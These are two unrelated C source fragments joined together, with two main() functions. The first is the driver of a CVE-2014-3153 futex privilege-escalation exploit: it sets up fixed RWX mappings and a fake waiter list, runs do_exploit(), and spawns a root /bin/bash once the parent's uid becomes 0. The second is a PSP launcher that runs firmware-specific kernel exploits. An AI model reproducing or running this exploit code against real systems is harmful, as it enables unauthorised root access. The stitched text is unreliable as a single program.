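int main(int argc, char *argv[])
{
	/*
	 * Harness for the CVE-2014-3153 (futex requeue) PoC.  The child process
	 * performs the kernel-side work (two fixed RWX mappings, a helper thread,
	 * a local socket pair, then do_exploit()); the parent only polls its own
	 * uid and, once the child has rewritten the parent's credentials, execs a
	 * shell.  Globals written here (main_pid, iov_*, sockfd,
	 * thread_client_to_setup_rt_waiter) are consumed by the helpers.
	 */
	const unsigned long scratch_addr = 0xb0000000UL;
	const unsigned long scratch_len = 0x10000;
	void *waiter_plist;
	pid_t child;

	(void)argc;
	(void)argv;

	printf("CVE-2014-3153 exploit by Chen Kaiqu([email protected])\n");

	main_pid = gettid();

	child = fork();
	if (child < 0) {
		/* The original treated -1 as "I am the parent" and spun in the
		 * uid-poll loop forever; a failed fork is a hard error. */
		perror("fork");
		return 1;
	}

	if (child == 0) {
		/*
		 * With MAP_FIXED a successful mmap() returns exactly the requested
		 * address, so the only failure value is MAP_FAILED ((void *)-1).
		 * The original compared the result against the hint with '<', which
		 * MAP_FAILED (all bits set) passes, so failures went undetected.
		 */
		void *map = mmap((void *)scratch_addr, scratch_len,
		                 PROT_READ | PROT_WRITE | PROT_EXEC,
		                 MAP_SHARED | MAP_FIXED | MAP_ANONYMOUS, -1, 0);
		if (map == MAP_FAILED) {
			printf("mmap failed?\n");
			perror("mmap");
			return 1;
		}
		iov_base0 = (unsigned long)map;
		iov_len0 = scratch_len;

		map = mmap((void *)MMAP_ADDR_BASE, MMAP_LEN,
		           PROT_READ | PROT_WRITE | PROT_EXEC,
		           MAP_SHARED | MAP_FIXED | MAP_ANONYMOUS, -1, 0);
		if (map == MAP_FAILED) {
			printf("mmap failed?\n");
			perror("mmap");
			return 1;
		}
		iov_basex = (unsigned long)map;
		iov_lenx = MMAP_LEN;

		/* The fake waiter plist is placed 0x400 bytes into the second
		 * mapping; the helper thread and do_exploit() both receive it. */
		waiter_plist = (void *)(iov_basex + 0x400);
		if (pthread_create(&thread_client_to_setup_rt_waiter, NULL,
		                   client_to_setup_rt_waiter, waiter_plist) != 0) {
			/* Unchecked in the original; a missing helper thread makes
			 * the server below block or the exploit misfire. */
			printf("pthread_create failed\n");
			return 1;
		}

		sockfd = server_for_setup_rt_waiter();
		if (sockfd < 0) {
			printf("Server failed\n");
			return 1;
		}

		return do_exploit(waiter_plist) ? 0 : 1;
	}

	/*
	 * Parent: wait until the child's kernel write has made us root.
	 * NOTE(review): this still spins forever if the child fails; detecting
	 * the child's exit would need waitpid() (<sys/wait.h>), which this file
	 * does not visibly include, so that is left as a known limitation.
	 */
	while (getuid())
		usleep(100);

	/* argv[0] was "bin/bash" (missing leading slash) in the original, and a
	 * failed exec fell through to "return 0" as if it had succeeded. */
	execl("/bin/bash", "/bin/bash", NULL);
	perror("execl");
	return 1;
}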
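/*
 * True when this build was compiled with support for the running firmware.
 * Each CONFIG_* switch enables one firmware family; a build with no CONFIG_*
 * defined supports nothing, matching the original goto chain.
 */
static int fw_version_supported(unsigned int version)
{
	(void)version;
#if defined(CONFIG_660) || defined(CONFIG_661)
	if (version == FW_660 || version == FW_661) {
		return 1;
	}
#endif
#ifdef CONFIG_639
	if (version == FW_639) {
		return 1;
	}
#endif
#ifdef CONFIG_620
	if (version == FW_620) {
		return 1;
	}
#endif
#ifdef CONFIG_635
	if (version == FW_635) {
		return 1;
	}
#endif
	return 0;
}

/*
 * Run the exploit matching the running firmware.  6.20 and 6.35 share one
 * do_exploit() and one CONFIG_620/CONFIG_635 guard, exactly as the original
 * dispatch did; an unsupported version is a no-op.
 */
static void run_exploit_for(unsigned int version)
{
	(void)version;
#if defined(CONFIG_660) || defined(CONFIG_661)
	if (version == FW_660 || version == FW_661) {
		do_exploit_660();
	}
#endif
#ifdef CONFIG_639
	if (version == FW_639) {
		do_exploit_639();
	}
#endif
#if defined(CONFIG_620) || defined(CONFIG_635)
	if (version == FW_620 || version == FW_635) {
		do_exploit();
	}
#endif
}

//entry point
int main(int argc, char * argv[])
{
	(void)argc;

	pspDebugScreenInit();

	psp_fw_version = sceKernelDevkitVersion();

	if (!fw_version_supported(psp_fw_version)) {
		pspDebugScreenPrintf("Sorry. This program doesn't support your FW(0x%08X).\n", (unsigned int)psp_fw_version);
		/* Leave the message on screen for 5 s before rebooting. */
		sceKernelDelayThread(5 * 1000000);
	} else {
		setup_patch_offset_table(psp_fw_version);

		/*
		 * The directory of the running program becomes the install
		 * directory.  NOTE(review): strcpy/strcat here are unbounded and
		 * installerpath's declaration is not visible in this listing, so
		 * the capacity to bound against is unknown; once it is confirmed
		 * to be an array, replace with
		 * snprintf(installerpath, sizeof installerpath, "%s", argv[0]).
		 * If argv[0] contains no '/', the whole path is kept and
		 * "installer.prx" is appended to it (unchanged from the original).
		 */
		strcpy(installerpath, argv[0]);

		char *slash = strrchr(installerpath, '/');
		if (slash) {
			slash[1] = '\0';
		}

		write_files(installerpath);
		strcat(installerpath, "installer.prx");

		printk_init("ms0:/launcher.txt");
		printk("Hello exploit\n");

		/* Under a custom firmware no kernel exploit is needed: install
		 * directly and return without the reboot below. */
		if (sctrlHENGetVersion() >= 0) {
			install_in_cfw();
			return 0;
		}

		run_exploit_for(psp_fw_version);
	}

	//trigger reboot
	sceKernelExitGame();

	//kill thread
	sceKernelExitDeleteThread(0);

	return 0;
}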